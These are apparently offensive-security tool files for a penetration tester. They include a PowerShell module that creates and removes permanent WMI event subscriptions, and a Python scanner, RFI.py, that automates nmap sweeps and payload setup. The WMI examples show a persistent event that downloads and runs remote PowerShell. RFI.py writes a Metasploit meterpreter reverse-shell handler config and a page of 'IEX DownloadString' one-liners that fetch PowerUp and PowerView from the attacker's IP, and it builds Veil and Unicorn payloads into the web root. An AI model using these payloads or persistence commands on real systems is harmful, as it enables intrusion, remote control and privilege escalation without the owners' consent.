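    parser = argparse.ArgumentParser(
        prog="Boost",
        description="Boost Script",
        epilog="Build the exploit environment.",
        formatter_class=argparse.RawTextHelpFormatter,
    )
    APRequiredGroup = parser.add_argument_group('General Program Options', 'General Configuration')
    APOptionalGroup = parser.add_argument_group('Optional Options', 'Optional Options')

    # Add arguments to the general group
    APRequiredGroup.add_argument('-i', '--interface', help="Interface the handler is on.")
    APRequiredGroup.add_argument('-p', '--port', help="Port the handler is listening on.")

    # Add arguments to the optional group. -v was a value-taking option in the
    # original although it is a flag; nothing reads it yet.
    APOptionalGroup.add_argument('-v', "--verbose", action="store_true", help="More verbose output.")
    APOptionalGroup.add_argument('-o', "--output", default='/var/www/html/indextesting.html',
                                 help="File to write the generated page to (default: %(default)s).")
    options = parser.parse_args()

    # Check for null command line
    if not options.interface or not options.port:
        parser.print_help()
        sys.exit(1)

    print("Now trying to write it to a file.")
    page = BuildHTTPPage(findIP(options.interface), options.port)
    with open(options.output, 'w') as f:
        f.write(page)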
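if __name__ == '__main__':
    main()

--------------------------------------------------------------------------------
/PowerShellWMIEvents.ps1:
--------------------------------------------------------------------------------
function Get-WMIEvent {

<#
.SYNOPSIS

Queries WMI for all __FilterToConsumerBinding, __EventFilter, and __EventConsumer instances as well as local events.

.DESCRIPTION

Default output is a hash table with 4 properties containing WMI LocalEvents, PermanentEvents, Consumers, and Filters.
Each property will contain the associated WMI objects. These can also be individually output using switches.

.PARAMETER Local

Indicates that local WMI events are returned with the results of the command.

.PARAMETER Permanent

Indicates that permanent WMI events are returned with the results of the command.

.PARAMETER Consumer

Indicates that WMI event consumers are returned with the results of the command.

.PARAMETER Filter

Indicates that WMI event filters are returned with the results of the command.

.PARAMETER Name

Specifies the WMI event name to return. Matched as a substring of the object's __RELPATH (WQL LIKE "%Name%").

.PARAMETER ComputerName

Specifies the remote computer system to query. The default is the local computer.

Type the NetBIOS name, an IP address, or a fully qualified domain name (FQDN) of one or more computers. To specify the local computer, type the computer name, a dot (.), or localhost.

.PARAMETER Credential

The credential object used to authenticate to the remote system. If not specified, the current user instance will be used.

.EXAMPLE

PS C:\>Get-WMIEvent -Name TestEvent

This command will return all WMI event objects named 'TestEvent'.

.EXAMPLE

PS C:\>Get-WMIEvent -Consumer -Filter

This command will return all WMI event consumers and filters.

.EXAMPLE

PS C:\>Get-WMIEvent -Permanent | Remove-WMIEvent

This command will return all permanent WMI events and then remove the event object and their associated consumers and filters.

.OUTPUTS

System.Collections.Hashtable, System.Management.Automation.PSEventSubscriber, System.Management.ManagementObject

By default, this cmdlet returns a System.Collections.Hashtable. If you use the Local parameter, it returns
System.Management.Automation.PSEventSubscriber objects. If you use the Permanent, Consumer, or Filter parameter, it
returns System.Management.ManagementObject objects.

#>

    Param (

        [Switch]
        $Local,

        [Switch]
        $Permanent,

        [Switch]
        $Consumer,

        [Switch]
        $Filter,

        [String]
        $Name,

        [String]
        $ComputerName,

        [Management.Automation.PSCredential]
        $Credential
    )

    # Common splat for every Get-WmiObject call: remote host and credential when given.
    $Arguments = @{}
    if ($ComputerName) {
        $Arguments['ComputerName'] = $ComputerName
        if ($Credential) {
            $Arguments['Credential'] = $Credential
        }
    }
    if ($Name) {
        # $Name is spliced into a WQL string literal; escape backslashes and
        # double quotes so an unusual name cannot break or alter the query.
        $SafeName = $Name -replace '\\', '\\' -replace '"', '\"'
        $Arguments['Filter'] = "__RELPATH LIKE `"%$SafeName%`""
    }

    if (!$Local -and !$Permanent -and !$Consumer -and !$Filter) {
        # No switch given: gather everything and return it as one hash table.
        # Local subscribers cannot be read from a remote host, so they stay $null then.
        $LocalEvents = $null
        if (!$ComputerName) {
            $LocalEvents = Get-EventSubscriber
        }
        $PermanentEvents = Get-WmiObject '__FilterToConsumerBinding' -Namespace root/subscription @Arguments
        [System.Collections.ArrayList]$Consumers = @()
        [System.Collections.ArrayList]$Filters = @()
        # Resolve each binding's consumer and filter by __RELPATH. A copy of the
        # splat is used so the Name filter built above is not overwritten.
        $LookupArguments = $Arguments.Clone()
        foreach ($EventEntry in $PermanentEvents) {
            $ConsumerId = $EventEntry.Consumer
            $FilterId = $EventEntry.Filter
            # A __RELPATH looks like Class.Name="x"; the class name precedes the first '.'.
            $LookupArguments['Filter'] = "__RELPATH='$ConsumerId'"
            [void]$Consumers.Add($(Get-WmiObject -Namespace root/subscription -Class $($ConsumerId.Split('.')[0]) @LookupArguments))
            $LookupArguments['Filter'] = "__RELPATH='$FilterId'"
            [void]$Filters.Add($(Get-WmiObject -Namespace root/subscription -Class $($FilterId.Split('.')[0]) @LookupArguments))
        }
        # The original passed this hash table positionally to New-Object PSObject,
        # which merely wraps it; the hash table itself is the documented output.
        @{
            LocalEvents = $LocalEvents
            PermanentEvents = $PermanentEvents
            Filters = $Filters
            Consumers = $Consumers
        }
    }

    if ($Local) {
        if ($ComputerName) {
            Write-Warning 'Cannot query remote hosts for local WMI event.'
        } else {
            Get-EventSubscriber
        }
    }
    if ($Permanent) {
        Get-WmiObject -Class __FilterToConsumerBinding -Namespace root/subscription @Arguments
    }
    if ($Consumer) {
        Get-WmiObject -Class __EventConsumer -Namespace root/subscription @Arguments
    }
    if ($Filter) {
        Get-WmiObject -Class __EventFilter -Namespace root/subscription @Arguments
    }
}

function Add-WMIPermanentEvent {
<#
.SYNOPSIS

Adds a region permanent WMI event using __FilterToConsumerBinding, __EventFilter, and __EventConsumer WMI classes.

.DESCRIPTION

This cmdlet takes command or script and a filter then creates a WMI Filter, Consumer, and FilterToConsumerBinding.
A number of WMI filters, or triggers, are configured and are specified with the 'trigger' parameter. There are two consumers
to choose from, command and script.

.PARAMETER Command

Indicates that an operating system command will be executed once the specified WMI event occurs. Provide a string or scriptblock
containing the command you would like to run.

.PARAMETER Script

Indicates that a provided Jscript or VBScript will run once a WMI event occurs. Provide a string or scriptblock containing
the script code you would like executed.

.PARAMETER Trigger

Specifies the event trigger (WMI Filter) to use.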
The options are InsertUSB, UserLogin, ProcessStart, Interval, and Timed. 169 | 170 | .PARAMETER EventName 171 | 172 | Specifies an arbitrary name to be assigned to the new permanent WMI event. 173 | 174 | .PARAMETER UserName 175 | 176 | Specifies the username that the UserLogin trigger will generate a WMI event for (optional). 177 | 178 | .PARAMETER ProcessName 179 | 180 | Specifies the process name when the ProcessStart trigger is selected (required). 181 | 182 | .PARAMETER IntervalPeriod 183 | 184 | Specifies the interval period when the Interval trigger is selected (required). 185 | 186 | .PARAMETER ExecutionTime 187 | 188 | Specifies the absolute time to generate a WMI event when the Timed trigger is selected (required). 189 | 190 | .PARAMETER ComputerName 191 | 192 | Specifies the remote computer system to add a permanent WMI event to. The default is the local computer. 193 | 194 | Type the NetBIOS name, an IP address, or a fully qualified domain name (FQDN) of one or more computers. To specify the local computer, type the computer name, a dot (.), or localhost. 195 | 196 | .PARAMETER Credential 197 | 198 | The credential object used to authenticate to the remote system. If not specified, the current user instance will be used. 
199 | 200 | .EXAMPLE 201 | 202 | PS C:\>Add-WMIPermanentEvent -EventName KillProc -Command "Powershell.exe -NoP -C `"Stop-Process -Id %ProcessId% -Force`"" -Trigger ProcessStart -ProcessName powershell.exe 203 | 204 | 205 | 206 | .EXAMPLE 207 | 208 | PS C:\>Add-WMIPermanentEvent -EventName DLThumbdrive -Script "" -Trigger InsertUSB 209 | 210 | .EXAMPLE 211 | 212 | PS C:\>Add-WMIPermanentEvent -EventName NotifyUponLogin -Command "cmd.exe /c `"ping 192.168.50.11`"" -Trigger UserLogin -UserName administrator 213 | 214 | .EXAMPLE 215 | 216 | PS C:\>Add-WMIPermanentEvent -EventName CheckIn -Command "powershell.exe -NoP -C IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.10/checkin.html')" -Trigger Interval -IntervalPeriod 10000 217 | 218 | .EXAMPLE 219 | 220 | PS C:\>Add-WMIPermanentEvent -EventName ExecuteSystemCheck -Script " 229 | 230 | Param ( 231 | [Parameter(Mandatory = $True, ParameterSetName = 'Command')] 232 | [String] 233 | [ValidateNotNullOrEmpty()] 234 | $Command, 235 | 236 | [Parameter(Mandatory = $True, ParameterSetName = 'Script')] 237 | [String] 238 | $Script, 239 | 240 | [Parameter(Mandatory = $True, ParameterSetName = 'Command')] 241 | [Parameter(Mandatory = $True, ParameterSetName = 'Script')] 242 | [String] 243 | [ValidateNotNullOrEmpty()] 244 | $EventName, 245 | 246 | [Parameter(Mandatory = $True, ParameterSetName = 'Command')] 247 | [Parameter(Mandatory = $True, ParameterSetName = 'Script')] 248 | [ValidateSet('InsertUSB', 'UserLogin', 'ProcessStart', 'Interval', 'Timed')] 249 | [String] 250 | [ValidateNotNullOrEmpty()] 251 | $Trigger, 252 | 253 | [String] 254 | $UserName, 255 | 256 | [String] 257 | $ProcessName, 258 | 259 | [String] 260 | $IntervalPeriod, 261 | 262 | [String] 263 | $ExecutionTime, 264 | 265 | [String] 266 | $ComputerName, 267 | 268 | [Management.Automation.PSCredential] 269 | $Credential 270 | ) 271 | 272 | #Error Checking 273 | if(($Trigger -eq 'ProcessStart') -and !$ProcessName){ 274 | Write-Warning 'A Process Name 
Must Be Specified.' 275 | return 276 | } 277 | if(($Trigger -eq 'Interval') -and !$IntervalPeriod){ 278 | Write-Warning 'An Interval Period Must Be Specified.' 279 | } 280 | if(($Trigger -eq 'Timed') -and !$ExecutionTime){ 281 | Write-Warning 'An Execution Time Must Be Specified.' 282 | } 283 | 284 | #Build optional argument splat if a remote system is specified 285 | $Arguments = @{} 286 | 287 | if ($ComputerName){ 288 | $Arguments['ComputerName'] = $ComputerName 289 | if ($Credential){ 290 | $Arguments['Credential'] = $Credential 291 | } 292 | } 293 | 294 | ###################################################### 295 | ### Consumer Setup, query, and variable assignment ### 296 | ###################################################### 297 | 298 | switch ($PsCmdlet.ParameterSetName) { 299 | #Build Command Line Consumer object if -Command is used 300 | 'Command' { 301 | $CommandConsumerArgs = @{ 302 | Name = $EventName 303 | CommandLineTemplate = $Command 304 | } 305 | $Consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments $CommandConsumerArgs @Arguments 306 | } 307 | #Build Active Script Consumer object if -Script is used 308 | 'Script' { 309 | $ScriptConsumerArgs = @{ 310 | Name = $EventName 311 | ScriptText = $Script 312 | } 313 | $Consumer = Set-WmiInstance -Namespace root/subscription -Class ActiveScriptEventConsumer -Arguments $ScriptConsumerArgs @Arguments 314 | } 315 | } 316 | 317 | Switch ($Trigger){ 318 | 'InsertUSB' {$Query = 'SELECT * FROM Win32_VolumeChangeEvent WHERE EventType = 2' } 319 | 'UserLogin' {if ($UserName){ 320 | $Query = "SELECT * FROM __InstanceCreationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_LoggedOnUser' AND TargetInstance.__RELPATH like `"%Name=\\\`"$UserName%`"" 321 | }else{ 322 | $Query = "SELECT * FROM __InstanceCreationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_LogonSession' AND TargetInstance.LogonType = 2" 323 | }} 324 | 'Interval' {$Query = ""} 325 | 'DateTime' {$Query = ""} 
326 | 'ProcessStart' {$Query = "SELECT * FROM Win32_ProcessStartTrace WHERE ProcessName='$ProcessName'";write-host $Query} 327 | 'LockedScreen' {$Query = "SELECT * FROM Win32_ProcessStartTrace WHERE ProcessName = 'LogonUI.exe'"} 328 | } 329 | 330 | #################################################### 331 | ### Filter Setup, query, and variable assignment ### 332 | #################################################### 333 | 334 | $EventFilterArgs = @{ 335 | EventNamespace = 'root/cimv2' 336 | Name = $EventName 337 | Query = $Query 338 | QueryLanguage = 'WQL' 339 | } 340 | 341 | $Filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments $EventFilterArgs @Arguments 342 | 343 | $FilterToConsumerArgs = @{ 344 | Filter = $Filter 345 | Consumer = $Consumer 346 | } 347 | 348 | ################################## 349 | ### Filter to Consumer Binding ### 350 | ################################## 351 | Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments $FilterToConsumerArgs @Arguments 352 | } 353 | 354 | function Remove-WMIEvent { 355 | 356 | <# 357 | .SYNOPSIS 358 | 359 | Removes WMI __FilterToConsumerBinding, __EventFilter, and __EventConsumer objects as well as local events. 360 | 361 | .DEFINITION 362 | 363 | This cmdlet will remove any WMI event object(s) piped to it. After removing a __FilterToConsumerBinding object, this 364 | cmdlet will also remove associated __EventFilter and __EventConsumer objects. 365 | 366 | .PARAMETER InputObject 367 | 368 | Indicates that WMI local events are returned with the results of the command. 369 | 370 | .PARAMETER ComputerName 371 | 372 | Specifies the remote computer system to add a permanent WMI event to. The default is the local computer. 373 | 374 | Type the NetBIOS name, an IP address, or a fully qualified domain name (FQDN) of one or more computers. To specify the local computer, type the computer name, a dot (.), or localhost. 
375 | 376 | .PARAMETER Credential 377 | 378 | The credential object used to authenticate to the remote system. If not specified, the current user instance will be used. 379 | 380 | .EXAMPLE 381 | 382 | PS C:\>Get-WMIEvent -Permanent | Remove-WMIEvent 383 | 384 | This command will remove each WMI __FilterToConsumerBinding object and their associated __EventFilter and __EventConsumer objects. 385 | 386 | .EXAMPLE 387 | 388 | PS C:\>$(Get-WmiObject -Namespace root/subscription -Class __EventFilter)[0] | Remove-WMIEvent 389 | 390 | This command will remove the first result after querying WMI __EventFilter objects. 391 | 392 | .EXAMPLE 393 | 394 | PS C:\>Get-EventSubscriber | Remove-WMIEvent 395 | 396 | This command will remove any local WMI events. 397 | 398 | .INPUTS 399 | 400 | System.Object.PSEventSubscriber, System.Management.ManagementBaseObject.ManagementObject 401 | 402 | You can pipe one or more WMI event objects to this cmdlet. 403 | 404 | #> 405 | 406 | Param ( 407 | [Parameter(Mandatory = $True, ValueFromPipeline = $True, ParameterSetName = 'Pipeline')] 408 | $InputObject, 409 | 410 | [String] 411 | $ComputerName, 412 | 413 | [Management.Automation.PSCredential] 414 | $Credential 415 | ) 416 | 417 | Begin { 418 | #Build optional argument splat if a remote system is specified 419 | $Arguments = @{} 420 | 421 | if($ComputerName){ 422 | $Arguments['ComputerName'] = $ComputerName 423 | if ($Credential){ 424 | $Arguments['Credential'] = $Credential 425 | } 426 | } 427 | } 428 | 429 | Process { 430 | foreach ($Event in $InputObject){ 431 | if($($Event.GetType().Name) -eq 'PSEventSubscriber'){ 432 | $Event | Unregister-Event 433 | }elseif($Event.__CLASS -eq '__FilterToConsumerBinding'){ 434 | $ConsumerId = $Event.Consumer 435 | $FilterId = $Event.Filter 436 | $Event | Remove-WmiObject 437 | Get-WmiObject -Namespace root/subscription -Class $ConsumerId.Split('.')[0] -Filter "__RELPATH='$ConsumerId'" @Arguments | Remove-WmiObject 438 | Get-WmiObject -Namespace 
root/subscription -Class $FilterId.Split('.')[0] -Filter "__RELPATH='$FilterId'" @Arguments | Remove-WmiObject 439 | }else{ 440 | $Event | Remove-WmiObject 441 | } 442 | } 443 | } 444 | 445 | End { 446 | 447 | } 448 | 449 | } 450 | -------------------------------------------------------------------------------- /Roll For Initiative/RFI.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # Andrew Luke @sw4mp_f0x 3 | # ToDo: 4 | # Standalone scan option for at least ping sweep. 5 | # Check for live-hosts before ping-sweep and ask if you still want to run. 6 | # 7 | # 8 | # Todo: 9 | # - Add ssh and telnet brute forcing 10 | # - Add NFSulator 11 | # - Implement new webinterface tool 12 | # - Automate excludes checking 13 | # - 14 | 15 | 16 | import sys 17 | import subprocess 18 | import os 19 | import logging 20 | import shutil 21 | 22 | 23 | def setup(): 24 | # Check for client folder. Create if it does not exist 25 | clients_path = "/root/Clients/" 26 | if not os.path.exists(clients_path): 27 | os.makedirs(clients_path) 28 | Client = raw_input("Client name: ") 29 | global client_folder 30 | client_folder = clients_path + Client + "/" 31 | if not os.path.exists(client_folder): 32 | os.makedirs(client_folder) 33 | 34 | 35 | #Check for required files 36 | while not os.path.exists(client_folder + "scope.txt"): 37 | create_scope = raw_input( 38 | "A list of IP addresses or IP ranges needs to be definied within %s. Hit enter when completed..." % ( 39 | client_folder + "scope.txt")) 40 | while not os.path.exists(client_folder + "excludes.txt"): 41 | create_scope = raw_input( 42 | "A list of IP addresses or IP ranges needs to be definied within %s, even if it is empty. Hit enter when completed..." 
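% (
    client_folder + "excludes.txt"))

    log_file = raw_input("Define log file location:[%s] " % (client_folder + Client + ".log"))
    if not log_file:
        log_file = client_folder + Client + ".log"
    logging.basicConfig(filename=log_file, format='%(asctime)s %(message)s', level=logging.INFO,
                        datefmt='%m/%d/%Y %I:%M:%S %p -')


def execute(selection):
    """Dispatch a main-menu choice ("1".."4") to its scan routine.

    Raises ValueError for a choice that is not on the menu, so that the
    caller's existing ValueError handler reports it instead of a bare
    KeyError escaping from the dictionary lookup.
    """
    options = {"1": kickoff,
               "2": web_interfaces,
               "3": service_scan,
               "4": pentest_setup
               }
    try:
        action = options[selection]
    except KeyError:
        raise ValueError("Unknown menu selection: %r" % (selection,))
    action()


# Tokens that mark a .gnmap line as unusable for the follow-on checks:
# comment lines ("#"), "Status: Up" lines and fingerprints of devices
# (printers, APC/Ricoh units, tcpwrapped ports) the author excludes.
_GNMAP_SKIP_TOKENS = ("telnet?", "print", "JetDirect", "#", "tcpwrapped",
                      "Ricoh", "Up", "APC", "Pocket")


def _run(command):
    """Run *command* (an argument list, no shell) and wait for it.

    The list form keeps paths built from the client name from being
    re-parsed by a shell (a name with spaces or shell metacharacters
    would otherwise break or alter the nmap command line).
    Returns the process exit status.
    """
    logging.info("Running: %s" % " ".join(command))
    return subprocess.call(command)


def _is_clean_target(line):
    """True when *line* contains none of the _GNMAP_SKIP_TOKENS."""
    return not any(token in line for token in _GNMAP_SKIP_TOKENS)


def _gnmap_hosts(gnmap_path, output_path, keep):
    """Write the host field of every accepted .gnmap line to *output_path*.

    *keep* is a predicate on the raw line; the second whitespace-separated
    field (the address in "Host: <addr> ...") is written, one per line.
    Lines with fewer than two fields are skipped rather than raising.
    Both files are closed on exit, including on error.
    """
    with open(gnmap_path) as gnmap, open(output_path, 'w') as out:
        for line in gnmap:
            if not keep(line):
                continue
            fields = line.split()
            if len(fields) > 1:
                out.write('%s\n' % fields[1])


def _scan_port(port, scripts=False):
    """Version-scan *port* (an nmap port spec) against live-hosts.txt.

    Output goes to <client_folder><port>.{nmap,gnmap,xml}; *scripts*
    adds the default NSE scripts (-sC).
    """
    logging.info("Scanning port %s." % (port))
    command = ['nmap', '-Pn', '-n', '-p' + port, '-sV']
    if scripts:
        command.append('-sC')
    command += ['--open', '-oA', client_folder + port, '-v10',
                '--stats-every', '1m', '-iL', client_folder + 'live-hosts.txt']
    _run(command)


def kickoff():
    """Run the initial sweep for a client: ping sweep, targeted port scans
    and the SMTP checks.

    Reads scope.txt / excludes.txt from the client folder, writes
    live-hosts.txt, one <port>.{nmap,gnmap,xml} set per scanned port,
    Finals/TelnetList.txt, 445.txt and the SMTP results under Finals/.
    Sets the module-level LiveHostCount to the number of hosts found in
    this run (it is no longer accumulated across runs).
    """
    global LiveHostCount
    # Ping-Sweep
    print("====================================")
    print("Beginning Kickoff Scan")
    print("====================================")
    logging.info("Beginning Ping Sweep")
    _run(['nmap', '-sn', '-v10', '-T4', '--open',
          '-iL', client_folder + 'scope.txt',
          '--excludefile', client_folder + 'excludes.txt',
          '-oG', client_folder + 'ping-sweep',
          '--stats-every', '1m'])
    logging.info("Ping Sweep Complete")
    _gnmap_hosts(client_folder + 'ping-sweep', client_folder + 'live-hosts.txt',
                 lambda line: "Up" in line)

    with open(client_folder + 'live-hosts.txt') as livehosts:
        LiveHostCount = sum(1 for _ in livehosts)

    # Check for exclusions within live-hosts
    print("\n\nRFI found %s live hosts on the network." % (LiveHostCount))
    raw_input("Check that the exclusions were actually excluded and then press [Enter] to continue...")

    # Targetted Port Scans
    print("====================================")
    print("Beginning Targetted Service Scans")
    print("====================================")

    logging.info("Beginning Targeted Port Scan")
    ports = ["22", "23", "53", "389", "686", "2049", "5800,5900-5920", "5985", "10000"]
    ports_NSE = ["445", "21", "25", "1433", "3306", "80"]

    for port in ports:
        _scan_port(port)

    for port in ports_NSE:
        _scan_port(port, scripts=True)

    logging.info("Targeted Port Scan Complete")

    if not os.path.exists(client_folder + "Finals"):
        os.makedirs(client_folder + "Finals")

    _gnmap_hosts(client_folder + '23.gnmap', client_folder + 'Finals/TelnetList.txt',
                 _is_clean_target)
    _gnmap_hosts(client_folder + '445.gnmap', client_folder + '445.txt',
                 lambda line: "Up" in line)

    print("====================================")
    print("Beginning SMTP Open Relay")
    print("and Enumeration NSE scripts")
    print("====================================")
    # Same exclusion list as the telnet list (kept as the author had it).
    _gnmap_hosts(client_folder + '25.gnmap', client_folder + 'smtprelay.txt',
                 _is_clean_target)

    logging.info("Checking for open relays")
    _run(['nmap', '-Pn', '--script', 'smtp-open-relay.nse', '-p', '25,465,587', '--open',
          '-iL', client_folder + 'smtprelay.txt', '-oA', client_folder + 'Finals/SMTP_Relay'])
    logging.info("Open relay check complete")

    logging.info("Checking for SMTP enum")
    _run(['nmap', '-Pn', '--script', 'smtp-enum-users.nse', '-p', '25,465,587', '--open',
          '-iL', client_folder + 'smtprelay.txt', '-oA', client_folder + 'Finals/SMTP_Enum'])
    logging.info("SMTP enum check complete")
    os.remove(client_folder + "smtprelay.txt")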
162 | global message 163 | message = "Kickoff scans complete" 164 | 165 | 166 | def web_interfaces(): 167 | print "====================================" 168 | print "Beginning Rawr Scan" 169 | print "====================================" 170 | logging.info("Starting Nmap web scan") 171 | web_scan = subprocess.Popen([ 172 | 'nmap -sV --open -T4 -v7 -p80,280,443,591,593,981,1311,2031,2480,3181,4444,4445,4567,4711,4712,5104,5280,7000,7001,7002,8000,8008,8011,8012,8013,8014,8042,8069,8080,8081,8243,8280,8281,8443,8531,8887,8888,9080,9443,11371,12443,16080,18091,18092 -iL %slive-hosts.txt -oA %sweb' % ( 173 | client_folder, client_folder)], shell=True) 174 | web_scan.wait() 175 | logging.info("Nmap web scan complete") 176 | 177 | logging.info("Starting Rawr") 178 | rawr_proc = subprocess.Popen(["python %s -f %sweb.xml -d %s" % (rawr_folder, client_folder, client_folder)], 179 | shell=True) 180 | rawr_proc.wait() 181 | logging.info("Rawr complete") 182 | 183 | global message 184 | message = "Rawr complete" 185 | 186 | 187 | def service_scan(): 188 | print "====================================" 189 | print "Beginning Service Scan" 190 | print "====================================" 191 | logging.info("Starting service scan") 192 | service_scan = subprocess.Popen( 193 | ['nmap -sV --open -iL %slive-hosts.txt -v10 -T4 -oA %ssvc-scan' % (client_folder, client_folder)], shell=True) 194 | service_scan.wait() 195 | logging.info("Service scan complete") 196 | 197 | global message 198 | message = "Service scan complete" 199 | 200 | 201 | def pentest_setup(): 202 | import boost 203 | print "====================================" 204 | print "Setting up pentest files" 205 | print "====================================" 206 | ip = raw_input("Enter LHOST> ") 207 | bounce = open('/bounce', "w") 208 | bounce.write('''use exploit/multi/handler 209 | jobs -K 210 | set payload windows/meterpreter/reverse_tcp 211 | set exitonsession false 212 | set lport 53 213 | set enablestageencoding true 
214 | set autorunscript migrate -f 215 | set LHOST %s 216 | exploit -j -z 217 | set payload windows/meterpreter/reverse_https 218 | set lport 443 219 | exploit -j -z''' % (ip)) 220 | 221 | bool = False 222 | while not bool: 223 | kali2 = raw_input("Are you using Kali 2? [y/n]: ") 224 | global cmd_path 225 | if kali2 is "n": 226 | cmd_path = "/var/www/cmd.html" 227 | bool = True 228 | elif kali2 is "y": 229 | cmd_path = "/var/www/html/cmd.html" 230 | bool = True 231 | 232 | cmd_html = ('''Invoke-AllChecks

233 | powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://%s:8080/PowerUp.ps1'); Invoke-Allchecks" 234 |

235 | Write-UserAddServiceBinary

236 | powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://%s:8080/PowerUp.ps1'); Write-UserAddServiceBinary -ServiceName SQLRODBC" 237 |

238 | Invoke-ServiceUserAdd

239 | powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://%s:8080/PowerUp.ps1'); Invoke-ServiceUserAdd -ServiceName spooler" 240 |

241 | Invoke-FindLocalAdminAccess

242 | powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://%s:8080/powerview.ps1'); Invoke-FindLocalAdminAccess" 243 |

244 | Invoke-userhunter

245 | powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://%s:8080/powerview.ps1'); Invoke-userhunter" 246 |

247 | Invoke-ShareFinder

248 | powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://%s:8080/powerview.ps1'); Invoke-ShareFinder -CheckShareAccess -Verbose | Out-File -Encoding ascii found_shares.txt"''' % ( 249 | ip, ip, ip, ip, ip, ip)) 250 | 251 | cmd_file = open(cmd_path, "w") 252 | cmd_file.write(cmd_html) 253 | cmd_file.close() 254 | 255 | # Deleting old files 256 | if os.path.exists("/root/HTTPS_443r.exe"): 257 | os.remove("/root/HTTPS_443r.exe") 258 | if os.path.exists("/root/TCP_53r.exe"): 259 | os.remove("/root/TCP_53r.exe") 260 | if os.path.exists("/root/power443.txt"): 261 | os.remove("/root/power443.txt") 262 | if os.path.exists("/root/power53.txt"): 263 | os.remove("/root/power53.txt") 264 | if os.path.exists("/var/www/html/HTTPS_443.exe"): 265 | os.remove("/var/www/html/HTTPS_443.exe") 266 | if os.path.exists("/var/www/html/TCP_53.exe"): 267 | os.remove("/var/www/html/TCP_53.exe") 268 | if os.path.exists("/var/www/html/power443.txt"): 269 | os.remove("/var/www/html/power443.txt") 270 | if os.path.exists("/var/www/html/power53.txt"): 271 | os.remove("/var/www/html/power53.txt") 272 | 273 | 274 | # Build Veil Payloads 275 | TCPport = raw_input("Define TCP listening port:[53] ") 276 | if not TCPport: 277 | TCPport = '53' 278 | HTTPSport = raw_input("Define HTTPS listening port:[443] ") 279 | if not HTTPSport: 280 | HTTPSport = '443' 281 | payload_type = raw_input("Define payload type (python, ruby, both): ") 282 | payload_paths = [] 283 | devnull = open('/dev/null', 'w') 284 | if payload_type == "both": 285 | payload_paths.append(boost.BuildVeilTCP(ip, TCPport, 'Veil_TCP_' + TCPport, lang='ruby', pwnstaller=True, overwrite=True)) 286 | payload_paths.append(boost.BuildVeilTCP(ip, TCPport, 'Veil_TCP_' + TCPport, lang='python', pwnstaller=True, overwrite=True)) 287 | payload_paths.append(boost.BuildVeilHTTPS(ip, HTTPSport, 'Veil_HTTPS_' + HTTPSport, lang='ruby', pwnstaller=True, overwrite=True)) 288 | payload_paths.append(boost.BuildVeilHTTPS(ip, 
HTTPSport, 'Veil_HTTPS_' + HTTPSport, lang='python', pwnstaller=True, overwrite=True)) 289 | elif payload_type == "python": 290 | payload_paths.append(boost.BuildVeilTCP(ip, TCPport, 'Veil_TCP_' + TCPport, lang='python', pwnstaller=True, overwrite=True)) 291 | payload_paths.append(boost.BuildVeilHTTPS(ip, HTTPSport, 'Veil_HTTPS_' + HTTPSport, lang='python', pwnstaller=True, overwrite=True)) 292 | elif payload_type == "ruby": 293 | payload_paths.append(boost.BuildVeilTCP(ip, TCPport, 'Veil_TCP_' + TCPport, lang='ruby', pwnstaller=True, overwrite=False, stdout=devnull, stderr=devnull)) 294 | payload_paths.append(boost.BuildVeilHTTPS(ip, HTTPSport, 'Veil_HTTPS_' + HTTPSport, lang='ruby', pwnstaller=True, overwrite=False, stdout=devnull, stderr=devnull)) 295 | 296 | for path in payload_paths: 297 | shutil.copyfile(path, "/root/%s" % (path.split('/')[-1])) 298 | shutil.copyfile(path, "/var/www/html/%s" % (path.split('/')[-1])) 299 | 300 | # Build Unicorn Powershell HTTPS payload 301 | unicorn_https = subprocess.Popen( 302 | ['python /root/tools/unicorn/unicorn.py windows/meterpreter/reverse_https %s %s' % (ip, HTTPSport)], shell=True) 303 | unicorn_https.wait() 304 | shutil.copyfile("./powershell_attack.txt", "/root/Powershell_HTTPS_%s.txt" % (HTTPSport)) 305 | shutil.copyfile("./powershell_attack.txt", "/var/www/html/Powershell_HTTPS_%s.txt" % (HTTPSport)) 306 | update_cmd = open(cmd_path, "a") 307 | open_payload = open("./powershell_attack.txt", "r") 308 | unicorn_https_payload = open_payload.readlines() 309 | update_cmd.write('''

310 | Powershell HTTPS Payload

311 | %s''' % (unicorn_https_payload[0])) 312 | open_payload.close() 313 | 314 | # Build Unicorn Powershell HTTPS payload 315 | unicorn_tcp = subprocess.Popen( 316 | ['python /root/tools/unicorn/unicorn.py windows/meterpreter/reverse_tcp %s %s' % (ip, TCPport)], shell=True) 317 | unicorn_tcp.wait() 318 | shutil.copyfile("./powershell_attack.txt", "/root/Powershell_TCP_%s.txt" % (TCPport)) 319 | shutil.copyfile("./powershell_attack.txt", "/var/www/html/Powershell_TCP_%s.txt" % (TCPport)) 320 | open_payload = open("./powershell_attack.txt", "r") 321 | unicorn_tcp_payload = open_payload.readlines() 322 | update_cmd.write('''

323 | Powershell TCP Payload

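%s''' % (unicorn_tcp_payload[0]))
    update_cmd.close()
    open_payload.close()
    os.remove("./powershell_attack.txt")
    os.remove("./unicorn.rc")

    global message
    message = "Pentest setup complete"


def ssh_telnet_brute():
    # NOTE: unfinished stub (see the "Add ssh and telnet brute forcing" ToDo
    # at the top of the file). `port` is not defined anywhere in this
    # function or at module level, so calling it raises NameError; it is
    # not reachable from the menu (execute() only dispatches options 1-4).
    logging.info("Scanning port %s." % (port))
    targetted_ports = subprocess.Popen([
        'nmap -Pn -n -p%s -sV --open -oA %s%s -v10 --stats-every 1m -iL %slive-hosts.txt' % (
            port, client_folder, port, client_folder)], shell=True)
    targetted_ports.wait()


def main_menu(check=""):
    """Print the menu, read one choice and dispatch it through execute().

    *check* is a status message from the previous action (or an "invalid
    entry" notice) printed above the menu; the module-level `message` is
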